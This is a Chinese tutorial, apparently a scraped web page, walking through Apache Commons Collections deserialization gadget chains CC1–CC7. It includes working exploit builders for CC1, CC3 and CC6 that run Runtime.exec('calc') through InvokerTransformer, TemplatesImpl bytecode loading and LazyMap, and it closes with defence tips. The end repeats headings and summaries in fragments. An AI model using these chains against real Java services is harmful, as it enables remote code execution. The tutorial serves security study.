Java反序列化之CC调用链过程1-7探究详解<\/h1>

1. CommonsCollections反序列化基础<\/h2>

1.1 反序列化漏洞原理<\/h3>
反序列化漏洞的核心在于当Java应用反序列化不可信数据时，攻击者可以构造恶意序列化对象，在反序列化过程中触发一系列方法调用，最终执行任意代码。<\/p>

1.2 关键版本信息<\/h3>

测试版本：jdk8u65（jdk8u71开始有漏洞修复）<\/li>

Commons-Collections包中的Transformer类是关键<\/li> <\/ul>

2. CommonsCollections1分析<\/h2>

2.1 Transformer类分析<\/h3>

Transformer<\/code>接口主要用途是接收对象并通过transform<\/code>方法进行操作。关键实现类：<\/p>


NOPTransformer<\/strong>：无操作，直接返回输入<\/li>
ConstantTransformer<\/strong>：返回固定常量<\/li>
InvokerTransformer<\/strong>：通过反射调用任意方法（危险类）<\/li>
<\/ol>
2.2 InvokerTransformer利用<\/h3>
InvokerTransformer<\/code>允许通过反射调用任意方法：<\/p>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> return<\/span> null<\/span>;<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>        return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span>
<\/span><\/span>    }<\/span> \/\/...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 命令执行验证<\/h3>
将Runtime.getRuntime().exec("calc")<\/code>转化为反射调用：<\/p>
Runtime r =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>Class c =<\/span> Runtime.<\/span>class<\/span>;<\/span>
<\/span><\/span>Method execMethod =<\/span> c.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>execMethod.<\/span>invoke<\/span>(<\/span>r,<\/span> "calc"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>使用InvokerTransformer<\/code>实现：<\/p>
new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>}).<\/span>transform<\/span>(<\/span>r);<\/span>
<\/span><\/span><\/code><\/pre>3. 调用链构造<\/h2>
3.1 后半条链：从transform到命令执行<\/h3>
寻找能调用transform<\/code>的类：<\/p>

TransformedMap<\/strong>：通过checkSetValue<\/code>调用valueTransformer.transform<\/code><\/li>
MapEntry.setValue<\/strong>：调用parent.checkSetValue<\/code><\/li>
<\/ol>
3.2 前半条链：从反序列化到transform<\/h3>
寻找在readObject<\/code>中能触发链的类：<\/p>

AnnotationInvocationHandler<\/strong>：在readObject<\/code>中遍历map并调用setValue<\/code><\/li>
<\/ol>
3.3 完整调用链<\/h3>
AnnotationInvocationHandler.readObject()
  -> TransformedMap.entrySet().iterator().next().setValue()
    -> TransformedMap.checkSetValue()
      -> InvokerTransformer.transform()
        -> Runtime.exec()
<\/code><\/pre>
3.4 EXP问题解决<\/h3>


Runtime不可序列化<\/strong>：通过反射链获取Runtime实例<\/p>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre><\/li>

if判断进入setValue<\/strong>：使用有方法名的注解类（如Target.class<\/code>）并将map的key设为"value"<\/code><\/p>
<\/li>

transform中value设置<\/strong>：使用ConstantTransformer<\/code>固定value<\/p>
<\/li>
<\/ol>
3.5 完整EXP(CC1TransformedMap)<\/h3>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> transformedmap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor annotationInvocationhdlConstructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>Object o =<\/span> annotationInvocationhdlConstructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedmap);<\/span>
<\/span><\/span><\/code><\/pre>4. CommonsCollections3：动态类加载<\/h2>
4.1 字节码加载方式<\/h3>

URLClassLoader<\/strong>：从远程加载类<\/li>
defineClass<\/strong>：直接加载字节码<\/li>
<\/ol>
4.2 TemplatesImpl利用<\/h3>
TemplatesImpl<\/code>提供了从字节码加载类的完整链：<\/p>
TemplatesImpl.newTransformer()
  -> getTransletInstance()
    -> defineTransletClasses()
      -> loader.defineClass()
        -> newInstance()
<\/code><\/pre>
4.3 恶意类要求<\/h3>

父类为AbstractTranslet<\/code><\/li>
实现transform<\/code>方法<\/li>
静态代码块中执行恶意代码<\/li>
<\/ol>
public<\/span> class<\/span> Demo<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> }<\/span>
<\/span><\/span>        catch<\/span> (<\/span>IOException e)<\/span> {<\/span> e.<\/span>printStackTrace<\/span>();<\/span> }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 必须实现的方法...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.4 EXP(CC3TemplatesImpl)<\/h3>
TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>\/\/ 设置_name
<\/span><\/span><\/span><\/span>Field nameField =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>nameField.<\/span>set<\/span>(<\/span>templates,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 加载字节码
<\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"Demo.class"<\/span>));<\/span>
<\/span><\/span>Field bytecodeField =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>bytecodeField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>bytecodeField.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> byte<\/span>[][]{<\/span>code});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置_tfactory
<\/span><\/span><\/span><\/span>Field tfactoryField =<\/span> templates.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>tfactoryField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>tfactoryField.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造调用链
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>templates),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span><\/code><\/pre>5. CommonsCollections6：绕过JDK高版本限制<\/h2>
5.1 调用链<\/h3>
利用HashMap<\/code>的readObject<\/code>触发：<\/p>
HashMap.readObject()
  -> hash()
    -> TiedMapEntry.hashCode()
      -> getValue()
        -> LazyMap.get()
          -> transform()
<\/code><\/pre>
5.2 关键类<\/h3>

TiedMapEntry<\/strong>：连接Map和Entry<\/li>
LazyMap<\/strong>：延迟调用transform<\/li>
<\/ol>
5.3 EXP(CC6TiedMapEntry)<\/h3>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>Map<<\/span>Object,<\/span>Object><\/span> Lazymap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>map,<\/span> new<\/span> ConstantTransformer(<\/span>1<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>TiedMapEntry tiedMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>Lazymap,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>HashMap<<\/span>Object,<\/span>Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map2.<\/span>put<\/span>(<\/span>tiedMapEntry,<\/span> "bbb"<\/span>);<\/span>
<\/span><\/span>Lazymap.<\/span>remove<\/span>(<\/span>"aaa"<\/span>);<\/span>  \/\/ 确保反序列化时能进入if
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 反射设置真正的transformer
<\/span><\/span><\/span><\/span>Field factoryField =<\/span> LazyMap.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"factory"<\/span>);<\/span>
<\/span><\/span>factoryField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>factoryField.<\/span>set<\/span>(<\/span>Lazymap,<\/span> chainedTransformer);<\/span>
<\/span><\/span><\/code><\/pre>6. 其他CC链变种<\/h2>
6.1 CommonsCollections4<\/h3>
利用TransformingComparator<\/code>在CC4中的序列化支持：<\/p>
PriorityQueue.readObject()
  -> heapify()
    -> siftDown()
      -> siftDownUsingComparator()
        -> compare()
          -> transform()
<\/code><\/pre>
6.2 CommonsCollections5<\/h3>
利用BadAttributeValueExpException<\/code>：<\/p>
BadAttributeValueExpException.readObject()
  -> toString()
    -> getValue()
      -> TiedMapEntry.getValue()
        -> LazyMap.get()
          -> transform()
<\/code><\/pre>
6.3 CommonsCollections7<\/h3>
利用Hashtable<\/code>的哈希碰撞：<\/p>
Hashtable.readObject()
  -> reconstitutionPut()
    -> equals()
      -> AbstractMapDecorator.equals()
        -> get()
          -> transform()
<\/code><\/pre>
7. 防御建议<\/h2>

升级Commons-Collections到安全版本<\/li>
使用JDK高版本（8u71+修复了部分问题）<\/li>
使用反序列化过滤器<\/li>
避免反序列化不可信数据<\/li>
<\/ol>
总结<\/h2>
CC链展示了Java反序列化漏洞的典型利用方式，通过精心构造的调用链，攻击者可以从反序列化操作最终执行任意代码。理解这些调用链有助于更好地防御此类漏洞。<\/p>

Java反序列化之CC调用链过程1-7探究详解<\/h1>

1. CommonsCollections反序列化基础<\/h2>

1.1 反序列化漏洞原理<\/h3> 反序列化漏洞的核心在于当Java应用反序列化不可信数据时，攻击者可以构造恶意序列化对象，在反序列化过程中触发一系列方法调用，最终执行任意代码。<\/p>

2. CommonsCollections1分析<\/h2>

3. 调用链构造<\/h2>

4. CommonsCollections3：动态类加载<\/h2>

5. CommonsCollections6：绕过JDK高版本限制<\/h2>

6. 其他CC链变种<\/h2>

总结<\/h2> CC链展示了Java反序列化漏洞的典型利用方式，通过精心构造的调用链，攻击者可以从反序列化操作最终执行任意代码。理解这些调用链有助于更好地防御此类漏洞。<\/p>

1.1 反序列化漏洞原理<\/h3>
反序列化漏洞的核心在于当Java应用反序列化不可信数据时，攻击者可以构造恶意序列化对象，在反序列化过程中触发一系列方法调用，最终执行任意代码。<\/p>

总结<\/h2>
CC链展示了Java反序列化漏洞的典型利用方式，通过精心构造的调用链，攻击者可以从反序列化操作最终执行任意代码。理解这些调用链有助于更好地防御此类漏洞。<\/p>